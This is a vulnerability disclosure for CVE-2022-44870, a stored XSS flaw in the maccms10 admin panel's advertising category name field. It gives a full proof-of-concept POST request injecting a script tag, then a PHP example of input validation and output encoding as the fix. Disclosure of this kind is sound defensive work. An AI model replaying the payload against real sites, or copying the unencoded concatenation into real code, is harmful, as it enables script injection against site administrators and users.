CVE-2022-44870

maccms admin+ xss attacks

Overview

Manufacturer's website information: https://maccms.pro

Source code download address: https://github.com/maccmspro/maccms10.git

1. Affected version: V2021.1000.2000

2. Vulnerability details

maccmspro/maccms10#23

Log in to the admin backend and go to Basics > AD Management > Name.

Insert payload1 in the name box:

The value is stored and later rendered without encoding, which causes XSS.

Vulnerability name: Stored XSS

Vulnerability level: Medium risk

Vulnerability location: Advertising management --> name

Insert <script>alert(1)</script> in the cat_title field at:

http://127.0.0.1/admin.php/admin/banner/infocat.html

3. Reproducing the vulnerability and POC

POST /admin.php/admin/banner/infocat.html HTTP/1.1
Host: 192.168.52.163
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:108.0) Gecko/20100101 Firefox/108.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 65
Origin: http://192.168.52.163
Connection: close
Referer: http://192.168.52.163/admin.php/admin/banner/infocat.html
Cookie: PHPSESSID=qgaks01bl6ip8j7fseaabj4l9q

cat_id=&cat_title=%3Cscript%3Ealert(1)%3C%2Fscript%3E&cat_code=111
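The fix for a stored value like cat_title has two parts: constrain it when it is saved and encode it when it is rendered. The following is an added example, not code from maccms10 or from this report; the function names, the allowed character set and the 64-character limit are assumptions chosen for illustration.

```php
<?php
declare(strict_types=1);

// Added example: hypothetical helpers, not maccms10 code.

/**
 * Input-side check for cat_title (assumed policy: 1-64 letters, digits,
 * spaces, underscore, dot or hyphen, in any script).
 */
function validate_cat_title(string $title): string
{
    $title = trim($title);
    if (preg_match('/^[\p{L}\p{N} _.\-]{1,64}$/u', $title) !== 1) {
        throw new InvalidArgumentException('cat_title contains disallowed characters');
    }
    return $title;
}

/** Output-side encoding for HTML text and quoted-attribute contexts. */
function e(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Constructed sample: the cat_title value from the request above, URL-decoded,
// as it would sit in the database if it had been saved unchecked.
$stored = '<script>alert(1)</script>';

// Before: the stored value is concatenated into the page, so the browser
// parses it as markup. Kept here only to contrast with the encoded form.
$unsafe = '<td>' . $stored . '</td>';

// After: the same value encoded at output is displayed as inert text.
$safe = '<td>' . e($stored) . '</td>';
echo $safe, PHP_EOL;

// Input validation rejects the sample and accepts an ordinary title.
try {
    validate_cat_title($stored);
} catch (InvalidArgumentException $ex) {
    echo 'rejected: ', $ex->getMessage(), PHP_EOL;
}
echo validate_cat_title('Home banner'), PHP_EOL;
```

Output encoding is the control that matters for rows already stored in the database; input validation only limits what can be saved from now on.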
